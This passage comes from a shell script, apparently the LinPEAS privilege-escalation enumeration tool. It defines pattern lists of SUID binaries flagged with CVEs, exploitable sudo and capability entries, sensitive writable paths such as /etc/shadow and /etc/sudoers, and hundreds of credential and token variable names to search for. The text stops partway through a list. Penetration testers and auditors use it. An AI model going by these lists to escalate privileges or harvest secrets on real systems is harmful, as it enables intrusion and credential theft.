-sidG1="/abuild-sudo$|/accton$|/allocate$|/ARDAgent|/arping$|/atq$|/atrm$|/authpf$|/authpf-noip$|/authopen$|/batch$|/bbsuid$|/bsd-write$|/btsockstat$|/bwrap$|/cacaocsc$|/camel-lock-helper-1.2$|/ccreds_validate$|/cdrw$|/chage$|/check-foreground-console$|/chrome-sandbox$|/chsh$|/cons.saver$|/crontab$|/ct$|/cu$|/dbus-daemon-launch-helper$|/deallocate$|/desktop-create-kmenu$|/dma$|/dmcrypt-get-device$|/doas$|/dotlockfile$|/dotlock.mailutils$|/dtaction$|/dtfile$|/eject$|/execabrt-action-install-debuginfo-to-abrt-cache$|/execdbus-daemon-launch-helper$|/execdma-mbox-create$|/execlockspool$|/execlogin_chpass$|/execlogin_lchpass$|/execlogin_passwd$|/execssh-keysign$|/execulog-helper$|/expiry$|/fdformat$|/fusermount$|/fusermount3$|/gnome-pty-helper$|/glines$|/gnibbles$|/gnobots2$|/gnome-suspend$|/gnometris$|/gnomine$|/gnotski$|/gnotravex$|/gpasswd$|/gpg$|/gpio$|/gtali|/.hal-mtab-lock$|/imapd$|/inndstart$|/kismet_cap_nrf_51822$|/kismet_cap_nxp_kw41z$|/kismet_cap_ti_cc_2531$|/kismet_cap_ti_cc_2540$|/kismet_capture$|/kismet_cap_linux_bluetooth$|/kismet_cap_linux_wifi$|/kismet_cap_nrf_mousejack$|/ksu$|/list_devices$|/locate$|/lock$|/lockdev$|/lockfile$|/login_activ$|/login_crypto$|/login_radius$|/login_skey$|/login_snk$|/login_token$|/login_yubikey$|/lpd$|/lpd-port$|/lppasswd$|/lpq$|/lprm$|/lpset$|/lxc-user-nic$" -sidG2="/mahjongg$|/mail-lock$|/mailq$|/mail-touchlock$|/mail-unlock$|/mksnap_ffs$|/mlocate$|/mlock$|/mount.cifs$|/mount.nfs$|/mount.nfs4$|/mtr$|/mutt_dotlock$|/ncsa_auth$|/netpr$|/netreport$|/netstat$|/newgidmap$|/newtask$|/newuidmap$|/opieinfo$|/opiepasswd$|/pam_auth$|/pam_extrausers_chkpwd$|/pam_timestamp_check$|/pamverifier$|/pfexec$|/ping$|/ping6$|/pmconfig$|/polkit-agent-helper-1$|/polkit-explicit-grant-helper$|/polkit-grant-helper$|/polkit-grant-helper-pam$|/polkit-read-auth-helper$|/polkit-resolve-exe-helper$|/polkit-revoke-helper$|/polkit-set-default-helper$|/postdrop$|/postqueue$|/poweroff$|/ppp$|/procmail$|/pt_chmod$|/pwdb_chkpwd$|/quota$|/remote.unknown$|/rlogin$|/rmformat$|/rnews$|/run-mailcap$|/sacadm$|/same-gnome$|screen.real$|/security_authtrampoline$|/sendmail.sendmail$|/shutdown$|/skeyaudit$|/skeyinfo$|/skeyinit$|/slocate$|/smbmnt$|/smbumount$|/smpatch$|/smtpctl$|/snap-confine$|/sperl5.8.8$|/ssh-agent$|/ssh-keysign$|/staprun$|/startinnfeed$|/stclient$|/su$|/suexec$|/sys-suspend$|/telnetlogin$|/timedc$|/tip$|/top$|/traceroute6$|/traceroute6.iputils$|/trpt$|/tsoldtlabel$|/tsoljdslabel$|/tsolxagent$|/ufsdump$|/ufsrestore$|/umount.cifs$|/umount.nfs$|/umount.nfs4$|/unix_chkpwd$|/uptime$|/userhelper$|/userisdnctl$|/usernetctl$|/utempter$|/utmp_update$|/uucico$|/uuglist$|/uuidd$|/uuname$|/uusched$|/uustat$|/uux$|/uuxqt$|/vmware-user-suid-wrapper$|/vncserver-x11$|/volrmmount$|/w$|/wall$|/whodo$|/write$|/X$|/Xorg.wrap$|/Xsun$|/Xvnc$" - -#Rules: Start path " /", end path "$", divide path and vulnversion "%". SPACE IS ONLY ALLOWED AT BEGINNING, DONT USE IT IN VULN DESCRIPTION -sidB="/apache2$%Read_root_passwd__apache2_-f_/etc/shadow\(CVE-2019-0211\)\ - /at$%RTru64_UNIX_4.0g\(CVE-2002-1614\)\ - /abrt-action-install-debuginfo-to-abrt-cache$%CENTOS 7.1/Fedora22 - /chfn$%SuSE_9.3/10\ - /chkey$%Solaris_2.5.1\ - /chkperm$%Solaris_7.0_\ - /chpass$%2Vulns:OpenBSD_6.1_to_OpenBSD 6.6\(CVE-2019-19726\)--OpenBSD_2.7_i386/OpenBSD_2.6_i386/OpenBSD_2.5_1999/08/06/OpenBSD_2.5_1998/05/28/FreeBSD_4.0-RELEASE/FreeBSD_3.5-RELEASE/FreeBSD_3.4-RELEASE/NetBSD_1.4.2\ - /chpasswd$%SquirrelMail\(2004-04\)\ - /dtappgather$%Solaris_7_<_11_\(SPARC/x86\)\(CVE-2017-3622\)\ - /dtprintinfo$%Solaris_10_\(x86\)_and_lower_versions_also_SunOS_5.7_to_5.10\ - /dtsession$%Oracle_Solaris_10_1/13_and_earlier\(CVE-2020-2696\)\ - /eject$%FreeBSD_mcweject_0.9/SGI_IRIX_6.2\ - /ibstat$%IBM_AIX_Version_6.1/7.1\(09-2013\)\ - /kcheckpass$%KDE_3.2.0_<-->_3.4.2_\(both_included\)\ - /kdesud$%KDE_1.1/1.1.1/1.1.2/1.2\ - /keybase-redirector%CentOS_Linux_release_7.4.1708\ - /login$%IBM_AIX_3.2.5/SGI_IRIX_6.4\ - /lpc$%S.u.S.E_Linux_5.2\ - /lpr$%BSD/OS2.1/FreeBSD2.1.5/NeXTstep4.x/IRIX6.4/SunOS4.1.3/4.1.4\(09-1996\)\ - /mount$%Apple_Mac_OSX\(Lion\)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8\ - /movemail$%Emacs\(08-1986\)\ - /netprint$%IRIX_5.3/6.2/6.3/6.4/6.5/6.5.11\ - /newgrp$%HP-UX_10.20\ - /ntfs-3g$%Debian9/8/7/Ubuntu/Gentoo/others/Ubuntu_Server_16.10_and_others\(02-2017\)\ - /passwd$%Apple_Mac_OSX\(03-2006\)/Solaris_8/9\(12-2004\)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1\(02-1997\)\ - /pkexec$%Linux4.10_to_5.1.17\(CVE-2019-13272\)/rhel_6\(CVE-2011-1485\)\ - /pppd$%Apple_Mac_OSX_10.4.8\(05-2007\)\ - /pt_chown$%GNU_glibc_2.1/2.1.1_-6\(08-1999\)\ - /pulseaudio$%\(Ubuntu_9.04/Slackware_12.2.0\)\ - /rcp$%RedHat_6.2\ - /rdist$%Solaris_10/OpenSolaris\ - /rsh$%Apple_Mac_OSX_10.9.5/10.10.5\(09-2015\)\ - /screen$%GNU_Screen_4.5.0\ - /sdtcm_convert$%Sun_Solaris_7.0\ - /sendmail$%Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2.4.0-test1_\(SGI_ProPack_1.2/1.3\)\ - /sudo$\ - /sudoedit$%Sudo/SudoEdit_1.6.9p21/1.7.2p4/\(RHEL_5/6/7/Ubuntu\)/Sudo<=1.8.14\ - /tmux$%Tmux_1.3_1.4_privesc\(CVE-2011-1496\)\ - /traceroute$%LBL_Traceroute_\[2000-11-15\]\ - /ubuntu-core-launcher$%Befre_1.0.27.1\(CVE-2016-1580\)\ - /umount$%BSD/Linux\(08-1996\)\ - /umount-loop$%Rocks_Clusters<=4.1\(07-2006\)\ - /uucp$%Taylor_UUCP_1.0.6\ - /XFree86$%XFree86_X11R6_3.3.x/4.0/4.x/3.3\(03-2003\)\ - /xlock$%BSD/OS_2.1/DG/UX_7.0/Debian_1.3/HP-UX_10.34/IBM_AIX_4.2/SGI_IRIX_6.4/Solaris_2.5.1\(04-1997\)\ - /xscreensaver%Solaris_11.x\(CVE-2019-3010\)\ - /xorg$%Xorg_1.19_to_1.20.x\(CVE_2018-14665\)/xorg-x11-server<=1.20.3/AIX_7.1_\(6.x_to_7.x_should_be_vulnerable\)_X11.base.rte<7.1.5.32_and_\ - /xterm$%Solaris_5.5.1_X11R6.3\(05-1997\)/Debian_xterm_version_222-1etch2\(01-2009\)" -sidVB='/aria2c$|/arp$|/ash$|/awk$|/base64$|/bash$|/busybox$|/cat$|/chmod$|/chown$|/cp$|/csh$|/curl$|/cut$|/dash$|/date$|/dd$|/diff$|/dmsetup$|/docker$|/ed$|/emacs$|/env$|/expand$|/expect$|/file$|/find$|/flock$|/fmt$|/fold$|/gdb$|/gimp$|/git$|/grep$|/head$|/ionice$|/ip$|/jjs$|/jq$|/jrunscript$|/ksh$|/ld.so$|/less$|/logsave$|/lua$|/make$|/more$|/mv$|/mysql$|/nano$|/nc$|/nice$|/nl$|/nmap$|/node$|/od$|/openssl$|/perl$|/pg$|/php$|/pic$|/pico$|/python$|/readelf$|/rlwrap$|/rpm$|/rpmquery$|/rsync$|/rvim$|/screen-4.5.0|/scp$|/sed$|/setarch$|/shuf$|/socat$|/sort$|/sqlite3$|/stdbuf$|/strace$|/systemctl$|/tail$|/tar$|/taskset$|/tclsh$|/tee$|/telnet$|/tftp$|/time$|/timeout$|/ul$|/unexpand$|/uniq$|/unshare$|/vim$|/watch$|/wget$|/xargs$|/xxd$|/zip$|/zsh$' - -sudoVB=" \*|env_keep\+=LD_PRELOAD|apt-get$|apt$|aria2c$|arp$|ash$|awk$|base64$|bash$|busybox$|cat$|chmod$|chown$|cp$|cpan$|cpulimit$|crontab$|csh$|curl$|cut$|dash$|date$|dd$|diff$|dmesg$|dmsetup$|dnf$|docker$|dpkg$|easy_install$|ed$|emacs$|env$|expand$|expect$|facter$|file$|find$|flock$|fmt$|fold$|ftp$|gdb$|gimp$|git$|grep$|head$|ionice$|ip$|irb$|jjs$|journalctl$|jq$|jrunscript$|ksh$|ld.so$|less$|logsave$|ltrace$|lua$|mail$|make$|man$|more$|mount$|mtr$|mv$|mysql$|nano$|nc$|nice$|nl$|nmap$|node$|od$|openssl$|perl$|pg$|php$|pic$|pico$|pip$|puppet$|python$|readelf$|red$|rlwrap$|rpm$|rpmquery$|rsync$|ruby$|run-mailcap$|run-parts$|rvim$|scp$|screen$|script$|sed$|service$|setarch$|sftp$|smbclient$|socat$|sort$|sqlite3$|ssh$|start-stop-daemon$|stdbuf$|strace$|systemctl$|tail$|tar$|taskset$|tclsh$|tcpdump$|tee$|telnet$|tftp$|time$|timeout$|tmux$|ul$|unexpand$|uniq$|unshare$|vi$|vim$|watch$|wget$|wish$|xargs$|xxd$|yum$|zip$|zsh$|zypper$" -sudoB="$(whoami)|ALL:ALL|ALL : ALL|ALL|NOPASSWD|/apache2|/cryptsetup|/mount" -sudoG="NOEXEC" - -sudocapsB="/apt-get|/apt|/aria2c|/arp|/ash|/awk|/base64|/bash|/busybox|/cat|/chmod|/chown|/cp|/cpan|/cpulimit|/crontab|/csh|/curl|/cut|/dash|/date|/dd|/diff|/dmesg|/dmsetup|/dnf|/docker|/dpkg|/easy_install|/ed|/emacs|/env|/expand|/expect|/facter|/file|/find|/flock|/fmt|/fold|/ftp|/gdb|/gimp|/git|/grep|/head|/ionice|/ip|/irb|/jjs|/journalctl|/jq|/jrunscript|/ksh|/ld.so|/less|/logsave|/ltrace|/lua|/mail|/make|/man|/more|/mount|/mtr|/mv|/mysql|/nano|/nc|/nice|/nl|/nmap|/node|/od|/openssl|/perl|/pg|/php|/pic|/pico|/pip|/puppet|/python|/readelf|/red|/rlwrap|/rpm|/rpmquery|/rsync|/ruby|/run-mailcap|/run-parts|/rvim|/scp|/screen|/script|/sed|/service|/setarch|/sftp|/smbclient|/socat|/sort|/sqlite3|/ssh|/start-stop-daemon|/stdbuf|/strace|/systemctl|/tail|/tar|/taskset|/tclsh|/tcpdump|/tee|/telnet|/tftp|/time|/timeout|/tmux|/ul|/unexpand|/uniq|/unshare|/vi|/vim|/watch|/wget|/wish|/xargs|/xxd|/yum|/zip|/zsh|/zypper" -capsB="=ep|cap_chown|cap_dac_override|cap_dac_read_search|cap_setuid" - -OLDPATH=$PATH -ADDPATH=":/usr/local/sbin\ - :/usr/local/bin\ - :/usr/sbin\ - :/usr/bin\ - :/sbin\ - :/bin" -spath=":$PATH" -for P in $ADDPATH; do - if [ ! -z "${spath##*$P*}" ]; then export PATH="$PATH$P" 2>/dev/null; fi -done -writeB="00-header|10-help-text|50-motd-news|80-esm|91-release-upgrade|\.sh$|\./|/authorized_keys|/bin/|/boot/|/etc/apache2/apache2.conf|/etc/apache2/httpd.conf|/etc/hosts.allow|/etc/hosts.deny|/etc/httpd/conf/httpd.conf|/etc/httpd/httpd.conf|/etc/inetd.conf|/etc/incron.conf|/etc/login.defs|/etc/logrotate.d/|/etc/modprobe.d/|/etc/pam.d/|/etc/php.*/fpm/pool.d/|/etc/php/.*/fpm/pool.d/|/etc/rsyslog.d/|/etc/skel/|/etc/sysconfig/network-scripts/|/etc/sysctl.conf|/etc/sysctl.d/|/etc/uwsgi/apps-enabled/|/etc/xinetd.conf|/etc/xinetd.d/|/etc/|/home//|/lib/|/log/|/mnt/|/root|/sys/|/usr/bin|/usr/games|/usr/lib|/usr/local/bin|/usr/local/games|/usr/local/sbin|/usr/sbin|/sbin/|/var/log/|\.timer$|\.service$|.socket$" -writeVB="/etc/anacrontab|/etc/bash.bashrc|/etc/bash_completion|/etc/bash_completion.d/|/etc/cron|/etc/environment|/etc/environment.d/|/etc/group|/etc/incron.d/|/etc/init|/etc/ld.so.conf.d/|/etc/master.passwd|/etc/passwd|/etc/profile.d/|/etc/profile|/etc/rc.d|/etc/shadow|/etc/sudoers|/etc/sudoers.d/|/etc/supervisor/conf.d/|/etc/supervisor/supervisord.conf|/etc/systemd|/etc/sys|/lib/systemd|/etc/update-motd.d/|/root/.ssh/|/run/systemd|/usr/lib/systemd|/systemd/system|/var/spool/anacron|/var/spool/cron/crontabs|"`echo $PATH 2>/dev/null | sed 's/:\.:/:/g' | sed 's/:\.$//g' | sed 's/^\.://g' | sed 's/:/$|^/g'` #Add Path but remove simple dot in PATH - -if [ "$MACPEAS" ]; then - sh_usrs="ImPoSSssSiBlEee" - nosh_usrs="ImPoSSssSiBlEee" - dscl . list /Users | while read uname; do - ushell=`dscl . -read "/Users/$uname" UserShell | cut -d " " -f2` - if [ "`grep \"$ushell\" /etc/shells`" ]; then sh_usrs="$sh_usrs|$uname"; else nosh_usrs="$nosh_usrs|$uname"; fi - done -else - sh_usrs=`cat /etc/passwd 2>/dev/null | grep -v "^root:" | grep -i "sh$" | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/' | sed 's/|sys|/|sys[\\\s:]|^sys$|/' | sed 's/|daemon|/|daemon[\\\s:]|^daemon$|/'`"ImPoSSssSiBlEee" #Modified bin, sys and daemon so they are not colored everywhere - nosh_usrs=`cat /etc/passwd 2>/dev/null | grep -i -v "sh$" | sort | cut -d ":" -f 1 | tr '\n' '|' | sed 's/|bin|/|bin[\\\s:]|^bin$|/'`"ImPoSSssSiBlEee" -fi -knw_usrs='daemon\W|^daemon$|message\+|syslog|www|www-data|mail|noboby|Debian\-\+|rtkit|systemd\+' -USER=`whoami` -if [ ! "$HOME" ]; then - if [ -d "/Users/$USER" ]; then HOME="/Users/$USER"; #Mac home - else HOME="/home/$USER"; - fi -fi -Groups="ImPoSSssSiBlEee"`groups "$USER" 2>/dev/null | cut -d ":" -f 2 | tr ' ' '|'` - -pwd_inside_history="7z|unzip|useradd|linenum|linpeas|mkpasswd|htpasswd|openssl|PASSW|passw|shadow|root|sudo|^su|pkexec|^ftp|mongo|psql|mysql|rdesktop|xfreerdp|^ssh|steghide|@" -pwd_in_variables="Dgpg.passphrase|Dsonar.login|Dsonar.projectKey|GITHUB_TOKEN|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|PUSHOVER_TOKEN|PUSHOVER_USER|VIRUSTOTAL_APIKEY|ACCESSKEY|ACCESSKEYID|ACCESS_KEY|ACCESS_KEY_ID|ACCESS_KEY_SECRET|ACCESS_SECRET|ACCESS_TOKEN|ACCOUNT_SID|ADMIN_EMAIL|ADZERK_API_KEY|ALGOLIA_ADMIN_KEY_1|ALGOLIA_ADMIN_KEY_2|ALGOLIA_ADMIN_KEY_MCM|ALGOLIA_API_KEY|ALGOLIA_API_KEY_MCM|ALGOLIA_API_KEY_SEARCH|ALGOLIA_APPLICATION_ID|ALGOLIA_APPLICATION_ID_1|ALGOLIA_APPLICATION_ID_2|ALGOLIA_APPLICATION_ID_MCM|ALGOLIA_APP_ID|ALGOLIA_APP_ID_MCM|ALGOLIA_SEARCH_API_KEY|ALGOLIA_SEARCH_KEY|ALGOLIA_SEARCH_KEY_1|ALIAS_NAME|ALIAS_PASS|ALICLOUD_ACCESS_KEY|ALICLOUD_SECRET_KEY|amazon_bucket_name|AMAZON_SECRET_ACCESS_KEY|ANDROID_DOCS_DEPLOY_TOKEN|android_sdk_license|android_sdk_preview_license|aos_key|aos_sec|APIARY_API_KEY|APIGW_ACCESS_TOKEN|API_KEY|API_KEY_MCM|API_KEY_SECRET|API_KEY_SID|API_SECRET|appClientSecret|APP_BUCKET_PERM|APP_NAME|APP_REPORT_TOKEN_KEY|APP_TOKEN|ARGOS_TOKEN|ARTIFACTORY_KEY|ARTIFACTS_AWS_ACCESS_KEY_ID|ARTIFACTS_AWS_SECRET_ACCESS_KEY|ARTIFACTS_BUCKET|ARTIFACTS_KEY|ARTIFACTS_SECRET|ASSISTANT_IAM_APIKEY|AURORA_STRING_URL|AUTH0_API_CLIENTID|AUTH0_API_CLIENTSECRET|AUTH0_AUDIENCE|AUTH0_CALLBACK_URL|AUTH0_CLIENT_ID|AUTH0_CLIENT_SECRET|AUTH0_CONNECTION|AUTH0_DOMAIN|AUTHOR_EMAIL_ADDR|AUTHOR_NPM_API_KEY|AUTH_TOKEN|AWS-ACCT-ID|AWS-KEY|AWS-SECRETS|AWS.config.accessKeyId|AWS.config.secretAccessKey|AWSACCESSKEYID|AWSCN_ACCESS_KEY_ID|AWSCN_SECRET_ACCESS_KEY|AWSSECRETKEY|AWS_ACCESS|AWS_ACCESS_KEY|AWS_ACCESS_KEY_ID|AWS_CF_DIST_ID|AWS_DEFAULT|AWS_DEFAULT_REGION|AWS_S3_BUCKET|AWS_SECRET|AWS_SECRET_ACCESS_KEY|AWS_SECRET_KEY|AWS_SES_ACCESS_KEY_ID|AWS_SES_SECRET_ACCESS_KEY|B2_ACCT_ID|B2_APP_KEY|B2_BUCKET|baseUrlTravis|bintrayKey|bintrayUser|BINTRAY_APIKEY|BINTRAY_API_KEY|BINTRAY_KEY|BINTRAY_TOKEN|BINTRAY_USER|BLUEMIX_ACCOUNT|BLUEMIX_API_KEY|BLUEMIX_AUTH|BLUEMIX_NAMESPACE|BLUEMIX_ORG|BLUEMIX_ORGANIZATION|BLUEMIX_PASS|BLUEMIX_PASS_PROD|BLUEMIX_SPACE|BLUEMIX_USER|BRACKETS_REPO_OAUTH_TOKEN|BROWSERSTACK_ACCESS_KEY|BROWSERSTACK_PROJECT_NAME|BROWSER_STACK_ACCESS_KEY|BUCKETEER_AWS_ACCESS_KEY_ID|BUCKETEER_AWS_SECRET_ACCESS_KEY|BUCKETEER_BUCKET_NAME|BUILT_BRANCH_DEPLOY_KEY|BUNDLESIZE_GITHUB_TOKEN|CACHE_S3_SECRET_KEY|CACHE_URL|CARGO_TOKEN|CATTLE_ACCESS_KEY|CATTLE_AGENT_INSTANCE_AUTH|CATTLE_SECRET_KEY|CC_TEST_REPORTER_ID|CC_TEST_REPOTER_ID|CENSYS_SECRET|CENSYS_UID|CERTIFICATE_OSX_P12|CF_ORGANIZATION|CF_PROXY_HOST|channelId|CHEVERNY_TOKEN|CHROME_CLIENT_ID|CHROME_CLIENT_SECRET|CHROME_EXTENSION_ID|CHROME_REFRESH_TOKEN|CI_DEPLOY_USER|CI_NAME|CI_PROJECT_NAMESPACE|CI_PROJECT_URL|CI_REGISTRY_USER|CI_SERVER_NAME|CI_USER_TOKEN|CLAIMR_DATABASE|CLAIMR_DB|CLAIMR_SUPERUSER|CLAIMR_TOKEN|CLIENT_ID|CLIENT_SECRET|CLI_E2E_CMA_TOKEN|CLI_E2E_ORG_ID|CLOUDAMQP_URL|CLOUDANT_APPLIANCE_DATABASE|CLOUDANT_ARCHIVED_DATABASE|CLOUDANT_AUDITED_DATABASE|CLOUDANT_DATABASE|CLOUDANT_ORDER_DATABASE|CLOUDANT_PARSED_DATABASE|CLOUDANT_PROCESSED_DATABASE|CLOUDANT_SERVICE_DATABASE|CLOUDFLARE_API_KEY|CLOUDFLARE_AUTH_EMAIL|CLOUDFLARE_AUTH_KEY|CLOUDFLARE_EMAIL|CLOUDFLARE_ZONE_ID|CLOUDINARY_URL|CLOUDINARY_URL_EU|CLOUDINARY_URL_STAGING|CLOUD_API_KEY|CLUSTER_NAME|CLU_REPO_URL|CLU_SSH_PRIVATE_KEY_BASE64|CN_ACCESS_KEY_ID|CN_SECRET_ACCESS_KEY|COCOAPODS_TRUNK_EMAIL|COCOAPODS_TRUNK_TOKEN|CODACY_PROJECT_TOKEN|CODECLIMATE_REPO_TOKEN|CODECOV_TOKEN|coding_token|CONEKTA_APIKEY|CONFIGURATION_PROFILE_SID|CONFIGURATION_PROFILE_SID_P2P|CONFIGURATION_PROFILE_SID_SFU|CONSUMERKEY|CONSUMER_KEY|CONTENTFUL_ACCESS_TOKEN|CONTENTFUL_CMA_TEST_TOKEN|CONTENTFUL_INTEGRATION_MANAGEMENT_TOKEN|CONTENTFUL_INTEGRATION_SOURCE_SPACE|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN|CONTENTFUL_MANAGEMENT_API_ACCESS_TOKEN_NEW|CONTENTFUL_ORGANIZATION|CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN|CONTENTFUL_TEST_ORG_CMA_TOKEN|CONTENTFUL_V2_ACCESS_TOKEN|CONTENTFUL_V2_ORGANIZATION|CONVERSATION_URL|COREAPI_HOST|COS_SECRETS|COVERALLS_API_TOKEN|COVERALLS_REPO_TOKEN|COVERALLS_SERVICE_NAME|COVERALLS_TOKEN|COVERITY_SCAN_NOTIFICATION_EMAIL|COVERITY_SCAN_TOKEN|CYPRESS_RECORD_KEY|DANGER_GITHUB_API_TOKEN|DATABASE_HOST|DATABASE_NAME|DATABASE_PORT|DATABASE_USER|datadog_api_key|datadog_app_key|DB_CONNECTION|DB_DATABASE|DB_HOST|DB_PORT|DB_PW|DB_USER|DDGC_GITHUB_TOKEN|DDG_TEST_EMAIL|DDG_TEST_EMAIL_PW|DEPLOY_DIR|DEPLOY_DIRECTORY|DEPLOY_HOST|DEPLOY_PORT|DEPLOY_SECURE|DEPLOY_TOKEN|DEPLOY_USER|DEST_TOPIC|DHL_SOLDTOACCOUNTID|DH_END_POINT_1|DH_END_POINT_2|DIGITALOCEAN_ACCESS_TOKEN|DIGITALOCEAN_SSH_KEY_BODY|DIGITALOCEAN_SSH_KEY_IDS|DOCKER_EMAIL|DOCKER_KEY|DOCKER_PASSDOCKER_POSTGRES_URL|DOCKER_RABBITMQ_HOST|docker_repo|DOCKER_TOKEN|DOCKER_USER|DOORDASH_AUTH_TOKEN|DROPBOX_OAUTH_BEARER|ELASTICSEARCH_HOST|ELASTIC_CLOUD_AUTH|env.GITHUB_OAUTH_TOKEN|env.HEROKU_API_KEY|ENV_KEY|ENV_SECRET|ENV_SECRET_ACCESS_KEY|eureka.awsAccessId|eureka.awsSecretKey|ExcludeRestorePackageImports|EXPORT_SPACE_ID|FIREBASE_API_JSON|FIREBASE_API_TOKEN|FIREBASE_KEY|FIREBASE_PROJECT|FIREBASE_PROJECT_DEVELOP|FIREBASE_PROJECT_ID|FIREBASE_SERVICE_ACCOUNT|FIREBASE_TOKEN|FIREFOX_CLIENT|FIREFOX_ISSUER|FIREFOX_SECRET|FLASK_SECRET_KEY|FLICKR_API_KEY|FLICKR_API_SECRET|FOSSA_API_KEY|ftp_host|FTP_LOGIN|FTP_PW|FTP_USER|GCLOUD_BUCKET|GCLOUD_PROJECT|GCLOUD_SERVICE_KEY|GCS_BUCKET|GHB_TOKEN|GHOST_API_KEY|GH_API_KEY|GH_EMAIL|GH_NAME|GH_NEXT_OAUTH_CLIENT_ID|GH_NEXT_OAUTH_CLIENT_SECRET|GH_NEXT_UNSTABLE_OAUTH_CLIENT_ID|GH_NEXT_UNSTABLE_OAUTH_CLIENT_SECRET|GH_OAUTH_CLIENT_ID|GH_OAUTH_CLIENT_SECRET|GH_OAUTH_TOKEN|GH_REPO_TOKEN|GH_TOKEN|GH_UNSTABLE_OAUTH_CLIENT_ID|GH_UNSTABLE_OAUTH_CLIENT_SECRET|GH_USER_EMAIL|GH_USER_NAME|GITHUB_ACCESS_TOKEN|GITHUB_API_KEY|GITHUB_API_TOKEN|GITHUB_AUTH|GITHUB_AUTH_TOKEN|GITHUB_AUTH_USER|GITHUB_CLIENT_ID|GITHUB_CLIENT_SECRET|GITHUB_DEPLOYMENT_TOKEN|GITHUB_DEPLOY_HB_DOC_PASS|GITHUB_HUNTER_TOKEN|GITHUB_KEY|GITHUB_OAUTH|GITHUB_OAUTH_TOKEN|GITHUB_RELEASE_TOKEN|GITHUB_REPO|GITHUB_TOKEN|GITHUB_TOKENS|GITHUB_USER|GITLAB_USER_EMAIL|GITLAB_USER_LOGIN|GIT_AUTHOR_EMAIL|GIT_AUTHOR_NAME|GIT_COMMITTER_EMAIL|GIT_COMMITTER_NAME|GIT_EMAIL|GIT_NAME|GIT_TOKEN|GIT_USER|GOOGLE_CLIENT_EMAIL|GOOGLE_CLIENT_ID|GOOGLE_CLIENT_SECRET|GOOGLE_MAPS_API_KEY|GOOGLE_PRIVATE_KEY|gpg.passphrase|GPG_EMAIL|GPG_ENCRYPTION|GPG_EXECUTABLE|GPG_KEYNAME|GPG_KEY_NAME|GPG_NAME|GPG_OWNERTRUST|GPG_PASSPHRASE|GPG_PRIVATE_KEY|GPG_SECRET_KEYS|gradle.publish.key|gradle.publish.secret|GRADLE_SIGNING_KEY_ID|GREN_GITHUB_TOKEN|GRGIT_USER|HAB_AUTH_TOKEN|HAB_KEY|HB_CODESIGN_GPG_PASS|HB_CODESIGN_KEY_PASS|HEROKU_API_KEY|HEROKU_API_USER|HEROKU_EMAIL|HEROKU_TOKEN|HOCKEYAPP_TOKEN|INTEGRATION_TEST_API_KEY|INTEGRATION_TEST_APPID|INTERNAL-SECRETS|IOS_DOCS_DEPLOY_TOKEN|IRC_NOTIFICATION_CHANNEL|JDBC:MYSQL|jdbc_databaseurl|jdbc_host|jdbc_user|JWT_SECRET|KAFKA_ADMIN_URL|KAFKA_INSTANCE_NAME|KAFKA_REST_URL|KEYSTORE_PASS|KOVAN_PRIVATE_KEY|LEANPLUM_APP_ID|LEANPLUM_KEY|LICENSES_HASH|LICENSES_HASH_TWO|LIGHTHOUSE_API_KEY|LINKEDIN_CLIENT_ID|LINKEDIN_CLIENT_SECRET|LINODE_INSTANCE_ID|LINODE_VOLUME_ID|LINUX_SIGNING_KEY|LL_API_SHORTNAME|LL_PUBLISH_URL|LL_SHARED_KEY|LOOKER_TEST_RUNNER_CLIENT_ID|LOOKER_TEST_RUNNER_CLIENT_SECRET|LOOKER_TEST_RUNNER_ENDPOINT|LOTTIE_HAPPO_API_KEY|LOTTIE_HAPPO_SECRET_KEY|LOTTIE_S3_API_KEY|LOTTIE_S3_SECRET_KEY|mailchimp_api_key|MAILCHIMP_KEY|mailchimp_list_id|mailchimp_user|MAILER_HOST|MAILER_TRANSPORT|MAILER_USER|MAILGUN_APIKEY|MAILGUN_API_KEY|MAILGUN_DOMAIN|MAILGUN_PRIV_KEY|MAILGUN_PUB_APIKEY|MAILGUN_PUB_KEY|MAILGUN_SECRET_API_KEY|MAILGUN_TESTDOMAIN|ManagementAPIAccessToken|MANAGEMENT_TOKEN|MANAGE_KEY|MANAGE_SECRET|MANDRILL_API_KEY|MANIFEST_APP_TOKEN|MANIFEST_APP_URL|MapboxAccessToken|MAPBOX_ACCESS_TOKEN|MAPBOX_API_TOKEN|MAPBOX_AWS_ACCESS_KEY_ID|MAPBOX_AWS_SECRET_ACCESS_KEY|MG_API_KEY|MG_DOMAIN|MG_EMAIL_ADDR|MG_EMAIL_TO|MG_PUBLIC_API_KEY|MG_SPEND_MONEY|MG_URL|MH_APIKEY|MILE_ZERO_KEY|MINIO_ACCESS_KEY|MINIO_SECRET_KEY|MYSQLMASTERUSER|MYSQLSECRET|MYSQL_DATABASE|MYSQL_HOSTNAMEMYSQL_USER|MY_SECRET_ENV|NETLIFY_API_KEY|NETLIFY_SITE_ID|NEW_RELIC_BETA_TOKEN|NGROK_AUTH_TOKEN|NGROK_TOKEN|node_pre_gyp_accessKeyId|NODE_PRE_GYP_GITHUB_TOKEN|node_pre_gyp_secretAccessKey|NPM_API_KEY|NPM_API_TOKEN|NPM_AUTH_TOKEN|NPM_EMAIL|NPM_SECRET_KEY|NPM_TOKEN|NUGET_APIKEY|NUGET_API_KEY|NUGET_KEY|NUMBERS_SERVICE|NUMBERS_SERVICE_PASS|NUMBERS_SERVICE_USER|OAUTH_TOKEN|OBJECT_STORAGE_PROJECT_ID|OBJECT_STORAGE_USER_ID|OBJECT_STORE_BUCKET|OBJECT_STORE_CREDS|OCTEST_SERVER_BASE_URL|OCTEST_SERVER_BASE_URL_2|OC_PASS|OFTA_KEY|OFTA_SECRET|OKTA_CLIENT_TOKEN|OKTA_DOMAIN|OKTA_OAUTH2_CLIENTID|OKTA_OAUTH2_CLIENTSECRET|OKTA_OAUTH2_CLIENT_ID|OKTA_OAUTH2_CLIENT_SECRET|OKTA_OAUTH2_ISSUER|OMISE_KEY|OMISE_PKEY|OMISE_PUBKEY|OMISE_SKEY|ONESIGNAL_API_KEY|ONESIGNAL_USER_AUTH_KEY|OPENWHISK_KEY|OPEN_WHISK_KEY|OSSRH_PASS|OSSRH_SECRET|OSSRH_USER|OS_AUTH_URL|OS_PROJECT_NAME|OS_TENANT_ID